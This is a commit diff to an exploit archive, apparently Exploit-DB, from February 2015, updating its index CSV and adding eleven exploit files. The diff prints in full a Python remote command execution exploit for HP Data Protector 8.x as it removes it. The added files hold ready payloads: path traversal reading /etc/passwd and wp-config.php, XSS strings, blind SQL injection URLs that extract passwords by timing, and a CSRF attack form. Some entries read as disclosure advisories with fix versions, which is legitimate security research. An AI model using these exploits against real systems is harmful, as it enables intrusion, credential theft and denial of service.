Update: 2015-02-11

11 new exploits

files.csv

@@ -32407,7 +32407,7 @@ id,file,description,date,author,platform,type,port
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
-35961,platforms/linux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",linux,remote,0
+35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0
 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0
@@ -32440,6 +32440,7 @@ id,file,description,date,author,platform,type,port
 35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
 35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0
+35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure Vulnerability",2011-07-27,securititracker,hardware,remote,0
 35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection Vulnerability",2011-07-25,Ehsan_Hp200,php,webapps,0
 36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection Vulnerability",2011-07-28,anonymous,php,webapps,0
@@ -32472,3 +32473,13 @@ id,file,description,date,author,platform,type,port
 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0
+36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0
+36033,platforms/php/webapps/36033.txt,"Search Network 2.0 'query' Parameter Cross Site Scripting Vulnerability",2011-08-08,darkTR,php,webapps,0
+36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0
+36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange 'referer_id' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
+36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
+36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
+36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
+36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
+36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80
+36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80

platforms/linux/remote/35961.py

@@ -1,69 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: HP-Data-Protector-8.x Remote command execution.
-# Google Dork: -
-# Date: 30/01/2015
-# Exploit Author: Juttikhun Khamchaiyaphum
-# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
-# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
-# Version: 8.x
-# Tested on: IA64 HP Server Rx3600
-# CVE : CVE-2014-2623
-# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
-
-import socket
-import struct
-import sys
-
-def exploit(host, port, command):
-    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    try:
-        sock.connect((host, port))
-        print "[+] Target connected."
-
-        OFFSET_DEC_START = 133
-        OFFSET_DEC = (OFFSET_DEC_START + len(command))
-        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
-        # print "len(command)" + str(len(command))
-        # print "OFFSET_DEC" + str(OFFSET_DEC)
-        OFFSET_HEX = "%x" % OFFSET_DEC
-        # print "OFFSET_HEX" + str(OFFSET_HEX)
-        OFFSET_USE = chr(OFFSET_DEC)
-        # print "Command Length: " + str(len(command))
-        PACKET_DATA = "\x00\x00\x00"+\
-        OFFSET_USE+\
-        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
-        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
-        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
-        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
-        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
-        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
-        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
-        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
-        " %s\x00" %command
-
-        # Send payload to target
-        print "[+] Sending PACKET_DATA"
-        sock.sendall(PACKET_DATA)
-
-        # Parse the response back
-        print "[*] Result:"
-        while True:
-            response = sock.recv(2048)
-            if not response: break
-            print response
-
-    except Exception as ex:
-        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
-        exit(-3)
-    sock.close()
-
-if __name__ == "__main__":
-    try:
-        target = sys.argv[1]
-        port = int(sys.argv[2])
-        command = sys.argv[3]
-        exploit(target, port, command)
-    except IndexError:
-         print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
-    exit(0)

platforms/multiple/dos/36037.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49103/info
+
+The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability.
+
+Successful exploits will allow attackers to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. 
+
+http://www.example.com:1111/?% 

platforms/php/webapps/35996.txt

@@ -0,0 +1,31 @@
+Exploit Title:  Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting 
+Software Link: http://sourceforge.net/projects/magmi/
+Author: SECUPENT 
+Website:www.secupent.com
+Email: research{at}secupent{dot}com
+Date: 5-2-2015
+
+
+
+Exploit(Local file inclusion) :
+
+ http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
+ 
+ 
+ Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
+ 
+ 
+Exploit(Cross Site Scripting): 
+
+ 1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E 
+ 
+ 2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
+ 
+
+ Screenshot 1:http://secupent.com/exploit/images/magmixss1.jpg
+ Screenshot 2: http://secupent.com/exploit/images/magmixss2.jpg 
+ 
+ 
+ Thanks for read :) 
+ Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.  
+ 

platforms/php/webapps/36032.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/49051/info
+
+Softbiz Recipes Portal script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/[path]/admin/index.php?msg=[XSS]
+http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
+http://www.example.com/[path]/signinform.php?errmsg=[XSS]
+http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS] 

platforms/php/webapps/36033.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49064/info
+
+Search Network is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Search Network 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example/demo/search.php?action=search_results&query=[XSS Attack] 

platforms/php/webapps/36034.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/49090/info
+
+OpenEMR is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+OpenEMR 4.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script>
+http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script>
+http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script>
+http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script>
+http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script>
+http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<"> 

platforms/php/webapps/36035.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49091/info
+
+BlueSoft Banner Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/signup.php?referer_id=1[SQLi] 

platforms/php/webapps/36036.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49092/info
+
+BlueSoft Rate My Photo Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?cmd=10&ty=2[SQLi] 

platforms/php/webapps/36038.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/49117/info
+
+eShop plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+eShop 6.2.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&viewemail=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/36039.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Wordpress Theme Divi Arbitrary File Download Vulnerability
+# Date: 08/02/2015
+# Exploit Author: pool and Fran_73
+# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/
+# Contact : ricof81@yahoo.com ( YM ) 
+# Tested on: Linux / Window
+# Google Dork: inurl:wp-content/themes/Divi/
+######################
+# PoC
+http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
+
+
+         

platforms/php/webapps/36040.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection
+# Date: 06-12-2014
+# Software Link: http://www.chamilo.org/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+
+1. Description
+  
+Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'.
+
+There is few places where this function is used without quotation marks.
+
+http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html
+
+2. Proof of Concept
+
+For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()).
+
+<form method="post" action="http://chamilo-url/main/forum/?action=move&content=forum&SubmitForumCategory=1&direction=1&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)">
+    <input type="hidden" name="SubmitForumCategory" value="1">
+    <input type="submit" value="Hack!">
+</form>
+
+For second exploit you need administrator privilege (there is no CSRF protection):
+
+http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)
+
+Those SQL will check if first password character user ID=1 is "d".
+
+  
+3. Solution:
+  
+Update to version 1.9.10
+https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues

platforms/php/webapps/36041.txt

@@ -0,0 +1,58 @@
+[CVE-2015-1467] Fork CMS - SQL Injection in Version 3.8.5
+
+----------------------------------------------------------------
+
+Product Information:
+
+Software: Fork CMS
+
+Tested Version: 3.8.5, released on Wednesday 14 January 2015
+
+Vulnerability Type: SQL Injection (CWE-89)
+
+Download link to tested version: http://www.fork-cms.com/download?release=3.8.5
+
+Description: Fork CMS is dedicated to creating a user friendly environment to build, monitor and update your website. We take great pride in being the Content Management System of choice for beginners and professionals. We combine this grand vision with the latest technological innovations to allow developers, front-end developers and designers to build kick-ass websites. This makes Fork CMS next in line for world domination. (copied from http://www.fork-cms.com/features)
+
+----------------------------------------------------------------
+
+Vulnerability description:
+
+When an authenticated user is navigating to "Settings/Translations" and is clicking on the button "Update Filter" the following GET-request is sent to the server:
+
+http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=
+
+
+The parameter language[] is prone to boolean-based blind and stacked queries SQL-Injection. WIth the following payload a delay can be provoked in the request of additional 10 seconds:
+
+http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value=
+
+Also the parameters type[] are prone to SQL-Injection.
+
+----------------------------------------------------------------
+
+Impact: 
+
+Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability.
+
+----------------------------------------------------------------
+
+Solution:
+
+Update to the latest version, which is   3.8.6, see http://www.fork-cms.com/download.
+
+----------------------------------------------------------------
+
+Timeline:
+
+Vulnerability found: 3.2.2015
+Vendor informed: 3.2.2015
+Response by vendor: 3.2.2015
+Fix by vendor 3.2.2015
+Public Advisory: 4.2.2015
+
+----------------------------------------------------------------
+
+Best regards,
+
+Sven Schleier